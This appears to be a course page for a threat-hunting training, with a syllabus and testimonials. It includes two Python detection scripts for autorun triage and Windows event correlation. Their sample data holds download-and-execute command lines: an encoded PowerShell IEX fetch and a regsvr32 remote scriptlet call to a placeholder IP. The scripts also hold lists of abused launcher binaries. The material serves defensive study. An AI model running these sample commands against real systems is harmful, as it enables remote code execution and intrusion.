Advanced threat hunting professional
Advanced Threat Hunting Professional training will prepare your mindset for end-to-end threat identification and hunting. Whether you sit on the blue, red, or purple team, a solid understanding of threat investigation and threat intelligence is vital if you want to be a complete IT security expert. You cannot be a professional defender without sufficient knowledge of attack techniques, and the same holds for penetration testers, who need to know how defenders detect them. The Advanced Threat Hunting Professional course is designed to give IT security specialists the abilities necessary to hunt for threats proactively and become advanced threat hunters.
In this training we work through a real-world APT attack case and its complete detection across multiple phases of threat hunting.
Advanced Threat Hunting Professional Training is for you if
- You’ve ever sat at a screen feeling paralyzed by not knowing what to look for next.
- You’ve always wanted to find evil on your network without alerts, but don’t know how to approach it.
- You struggle to dissect attacks and derive hunting strategies from them.
- You have a mountain of data at your disposal but don’t know which techniques are best suited for gaining the necessary perspective over it to spot anomalies.
- You want to add threat hunting capabilities to your security team but don’t know how to get buy-in from management or prove just how valuable it can be.
- You want to learn how to approach threats along an APT timeline.
Who should attend this training?
- Security Operations Center analysts and engineers
- Incident response team members
- Penetration testers/Red team members
- Network security engineers
- Information security consultants and IT auditors
Why should I take this training?
The Advanced Threat Hunting Training course is designed to provide IT security professionals with the skills necessary not only to proactively hunt for threats, but also to become a stealthier penetration tester.
Prerequisites for the training
- A solid understanding of computer networks: switches, routing, security devices, common network protocols, etc. (recommended)
- An intermediate understanding of IT security matters
What is the duration of the training?
It is an instructor-led online training with a total duration of 45 hours.
Threat hunting essentials
- The process of Investigation
- Where threat hunting fits in, and how it is defined
- Incident Response & Threat Hunting relationship
- Threat Hunting Teams
- Tactics, Techniques, and Procedures
- Cyber Kill Chain Model
- Diamond Model
- Understanding TTP with MITRE ATT&CK
- Aligning MITRE ATT&CK tactics to collect threat intelligence about adversaries
- Sophisticated APT case – An enterprise attack-based scenario for this training
Mapping Windows INSECURITIES
- Advanced Persistent Threats
- How to identify compromised machines
- Finding persistent malware beacons
- Sophisticated malware tradecraft – living off the land (LOLBAS)
- Identifying and understanding system attacks:
- AutoStart Locations, RunKeys
- Service Creation/Replacement
- Service Failure Recovery
- Scheduled Tasks
- DLL Hijacking Attacks
- PowerShell events
- PowerShell Remoting basics
- Kansa for PowerShell based investigations
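The autostart locations, LOLBAS abuse and PowerShell topics above are easier to grasp with a concrete hunt. The following script is an added example, not course material or Kansa code: it triages autorun entries (such as Run/RunOnce key values collected from a fleet) by scoring LOLBAS launchers, encoded PowerShell, remote URLs and executables in user-writable paths, and decodes the -EncodedCommand payload so the analyst can read what the beacon actually does. The sample entries, the 198.51.100.7 address and the scoring weights are constructed for illustration.

```python
import base64
import re

# Subset of binaries catalogued by the LOLBAS project that are commonly
# abused as autorun launchers. Not exhaustive; extend from the project list.
LOLBAS_LAUNCHERS = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "certutil.exe", "bitsadmin.exe", "msiexec.exe", "installutil.exe",
    "regasm.exe", "regsvcs.exe", "forfiles.exe", "pcalua.exe",
}
# Directories an unprivileged user can write to. Legitimate software lives
# here too, so this indicator only adds weight and is never conclusive.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...).
ENC_RE = re.compile(r"-e(?:c|n|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

# Constructed sample of autorun entries in the shape a collector would return
# them: (registry key, value name, command line). Not from any real host.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b')".encode("utf-16-le")
).decode()
SAMPLE_AUTORUNS = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell.exe -nop -w hidden -enc " + ENCODED),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Helper",
     r"rundll32.exe C:\ProgramData\svc\helper.dll,Start"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Reg",
     r"regsvr32.exe /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"),
]


def first_image(cmdline: str) -> str:
    """Lower-cased basename of the launched executable (quoted or bare path)."""
    s = cmdline.strip()
    image = s[1:s.find('"', 1)] if s.startswith('"') else s.split()[0]
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline: str):
    """Decode an -EncodedCommand payload (base64 of UTF-16LE text), else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_autorun(key: str, name: str, cmdline: str) -> dict:
    """Score one entry and keep the reasons, so the analyst can judge the lead."""
    reasons, score = [], 0
    image = first_image(cmdline)
    decoded = decode_encoded_powershell(cmdline)
    text = cmdline + (" " + decoded if decoded else "")  # scan the decoded payload too
    if image in LOLBAS_LAUNCHERS:
        score += 2; reasons.append(f"LOLBAS launcher {image}")
    if decoded is not None:
        score += 3; reasons.append("encoded PowerShell command")
    if HIDDEN_RE.search(cmdline):
        score += 1; reasons.append("hidden window")
    urls = URL_RE.findall(text)
    if urls:
        score += 2; reasons.append("remote URL " + ", ".join(urls))
    if USER_WRITABLE.search(cmdline):
        score += 1; reasons.append("executable in user-writable path")
    return {"key": key, "name": name, "cmdline": cmdline, "decoded": decoded,
            "score": score, "reasons": reasons}


def hunt_autoruns(entries, threshold: int = 2):
    """Entries at or above the threshold, worst first; single weak signals are dropped."""
    hits = [triage_autorun(*e) for e in entries]
    return sorted((h for h in hits if h["score"] >= threshold),
                  key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for h in hunt_autoruns(SAMPLE_AUTORUNS):
        print(h["score"], h["name"], h["reasons"], h["decoded"])
```

The threshold is what keeps the OneDrive entry (a legitimate binary under AppData) out of the results while the encoded PowerShell beacon, the regsvr32 scriptlet download and the rundll32 DLL in ProgramData surface in order of severity; tune the weights to your environment rather than treating them as fixed.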
PRACTICAL WINDOWS ENUMERATION
- Identifying and understanding Active Directory attacks:
- Pass the Hash
- Credential Attacks with Mimikatz
- Token Stealing
- Cached Credentials
- LSA Secrets
- Kerberos Attacks
- Golden Tickets
- NTDS.DIT theft
- BloodHound analysis
- Common dumping tools
- Common Hiding and Persistence Mechanisms
Lateral movement attack detection
- Credential compromise techniques
- Remote Desktop Services Misuse
- Windows Admin Share Abuse
- PsExec and Cobalt Strike Beacon PsExec Activity
- Windows Remote Management Tool Techniques
- PowerShell Remoting/WMIC Hacking
- Cobalt Strike Lateral Movement and Credential Use
- Detecting software vulnerability exploitation
- Command-Line Analysis and WMI Activity Logging
- PowerShell Transcript and Script Block Logging
- Discovering Cobalt Strike beacon PowerShell Import Activity
- Detecting PowerShell Injection from Cobalt Strike, Metasploit, and Empire
- PowerShell Script Obfuscation
Live examination of compromised machines
- Infected Environment isolation
- Malware Persistence Detection and Analysis
- Scaling Data Collection and Analysis Across the Enterprise
- Finding and Analyzing Malicious WMI attacks
- Live memory acquisition
- Acquisition from multiple sites
- Shimcache and Amcache anatomy for threat hunters
- Shellbags for Threat hunters
- NTUSER.DAT and UsrClass.dat for threat hunting
- MFT and MRU for threat hunters
- APT hunting in memory in depth
- APT case mind map with live examination
- Memory Forensics Analysis Process for threat hunting
- Understanding Common Windows Services and Processes
- Identify Rogue Processes
- Analyze Process DLLs and Handles
- Review Network Artifacts
- Look for Evidence of Code Injection
- Check for Signs of a Rootkit
- Acquire Suspicious Processes and Drivers
- Advanced Memory Analysis with Volatility
- Webshell Detection Via Process Tree Analysis
- Code Injection, Malware, and Rootkit Hunting in Memory
- WMI and PowerShell Process intrusions
- Extract Memory-Resident Adversary Command Lines
- Investigate Windows Services
- Hunting Malware Using Comparison Baseline Systems
- Find and Dump Cached Files from RAM
Log analysis primer
Log Analysis for Incident Responders and Hunters
- Profiling Account Usage and Logons
- Tracking and Hunting Lateral Movement
- Identifying Suspicious Services
- Detecting Rogue Application Installation
- Finding Malware Execution and Process Tracking
- Capturing Command Lines and Scripts
- Anti-Forensics and Event Log Clearing
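The lateral movement detection module and the log analysis primer above both come down to correlating Windows events. The script below is an added example written for this page, not course material: it runs four hunts over Security/System log records as a SIEM would export them, namely account fan-out across hosts (profiling logons), PsExec-style service installs tied to the network logon just before them, shells spawned by remote-execution host processes (PSEXESVC, WMI, WinRM, the service control manager), and Security log clearing (event 1102). The events, hostnames, accounts and 10.0.1.x addresses are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events in the shape a SIEM export of the Windows Security and
# System logs would give (one dict per record, fields named as in EventData).
# Illustrative only; not taken from any real incident.
SAMPLE_EVENTS = [
    {"ts": "2023-04-02T09:00:05", "host": "FS01", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "alice", "IpAddress": "10.0.1.15"},
    {"ts": "2023-04-02T09:00:10", "host": "FS01", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "svc_backup", "IpAddress": "10.0.1.77"},
    {"ts": "2023-04-02T09:00:12", "host": "FS01", "id": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"ts": "2023-04-02T09:00:13", "host": "FS01", "id": 4688,
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\PSEXESVC.exe", "CommandLine": "cmd.exe /c whoami /all"},
    {"ts": "2023-04-02T09:01:30", "host": "WS07", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "svc_backup", "IpAddress": "10.0.1.77"},
    {"ts": "2023-04-02T09:01:33", "host": "WS07", "id": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c Get-ChildItem C:\Users"},
    {"ts": "2023-04-02T09:02:00", "host": "DC01", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "svc_backup", "IpAddress": "10.0.1.77"},
    {"ts": "2023-04-02T09:03:00", "host": "WS07", "id": 1102, "SubjectUserName": "svc_backup"},
]

# Parents that spawn a shell only when something executes code remotely.
REMOTE_EXEC_PARENTS = {"psexesvc.exe", "wmiprvse.exe", "wsmprovhost.exe", "services.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def ts(e):
    return datetime.fromisoformat(e["ts"])


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def profile_logons(events, logon_types=(3, 10)):
    """Per account: the (source IP, target host) pairs seen for network (3) and RDP (10) logons."""
    prof = defaultdict(set)
    for e in events:
        if e["id"] == 4624 and e["LogonType"] in logon_types:
            prof[e["TargetUserName"]].add((e["IpAddress"], e["host"]))
    return dict(prof)


def hunt_fan_out(events, max_hosts=2, window=timedelta(minutes=10)):
    """One account logging on to more than max_hosts distinct hosts inside the window."""
    by_user = defaultdict(list)
    for e in sorted(events, key=ts):
        if e["id"] == 4624 and e["LogonType"] in (3, 10):
            by_user[e["TargetUserName"]].append(e)
    findings = []
    for user, logons in by_user.items():
        for i, e in enumerate(logons):
            recent = {x["host"] for x in logons[: i + 1] if ts(e) - ts(x) <= window}
            if len(recent) > max_hosts:
                findings.append({"ts": e["ts"], "rule": "lateral fan-out", "user": user, "hosts": sorted(recent)})
                break  # one finding per account is enough to open an investigation
    return findings


def hunt_psexec(events, window=timedelta(seconds=60)):
    """Service installs that look like PsExec, with the network logons just before them."""
    findings = []
    for svc in events:
        if svc["id"] != 7045:
            continue
        if svc["ServiceName"].upper() != "PSEXESVC" and "\\admin$\\" not in svc["ImagePath"].lower():
            continue
        # Most recent logon first: it is the likeliest owner of the service install.
        prior = sorted(((ts(e), e["TargetUserName"], e["IpAddress"]) for e in events
                        if e["id"] == 4624 and e["LogonType"] == 3 and e["host"] == svc["host"]
                        and timedelta(0) <= ts(svc) - ts(e) <= window), reverse=True)
        findings.append({"ts": svc["ts"], "rule": "psexec service install", "host": svc["host"],
                         "service": svc["ServiceName"], "candidates": [(u, ip) for _, u, ip in prior]})
    return findings


def hunt_remote_exec_children(events):
    """Shells whose parent is a remote-execution host process (PsExec, WMI, WinRM, SCM)."""
    return [{"ts": e["ts"], "rule": "remote exec child", "host": e["host"],
             "parent": basename(e["ParentProcessName"]), "cmdline": e["CommandLine"]}
            for e in events if e["id"] == 4688
            and basename(e["ParentProcessName"]) in REMOTE_EXEC_PARENTS
            and basename(e["NewProcessName"]) in SHELLS]


def hunt_log_clearing(events):
    """Event 1102: the Security log was cleared; the clearing account is the lead."""
    return [{"ts": e["ts"], "rule": "security log cleared", "host": e["host"], "user": e["SubjectUserName"]}
            for e in events if e["id"] == 1102]


def hunt(events):
    """Run every rule and return the findings in time order."""
    findings = (hunt_fan_out(events) + hunt_psexec(events)
                + hunt_remote_exec_children(events) + hunt_log_clearing(events))
    return sorted(findings, key=lambda f: f["ts"])


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

Read the output as a timeline: a service account arrives over NTLM, PsExec installs its service and spawns cmd.exe, the same account moves on to a workstation where WMI spawns PowerShell, then reaches the domain controller, and finally the Security log on the workstation is wiped. Events 4688 with command lines and 7045 only exist if process auditing with command-line capture and System log collection are enabled, which is the first thing to verify before relying on these hunts.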
Network threat hunting
- ARP traffic investigation
- ICMP traffic hunting
- Broad TCP and UDP analysis
- DHCP and DNS examination
- Hunting suspicious HTTP and HTTPS traffic
- Hunting internal corporate threats
- Investigating network attacks and correlating forensic evidence
- RSA NetWitness Investigator for threat hunters
- Investigating network traffic with Security Onion and ELK
- Investigating host network connections with osquery
SIEM for threat hunters
- Splunk 101 for threat hunters
- ELK 101 for threat hunters
- Volume shadow snapshot analysis
- Timelines incorporating volume shadow snapshot data
- Anti-Forensics analysis using NTFS filesystem components
- Timestomping identification and suspicious file detection
- Advanced data recovery with records carving and deleted volume shadow copy recovery
What People Are Saying
Today I've completed my one-to-one online training by Mr Naresh sir from Certcube Labs.
This is the first time I have attended a class in this format and wondered how effective it would be. It was very effective and therefore I would definitely be interested in attending other classes in the same format. The instructor was very knowledgeable and provided a wealth of information about the current version, especially since the last version I used was several releases ago.
5 star training. Naresh is the best. He made me zero to hero in 3 months' time. A little bit expensive compared to others, but totally worth it.
We're Here To Help!
3500 , 1st Floor , Raja Park , New Delhi -110034
M-S: 10am - 11pm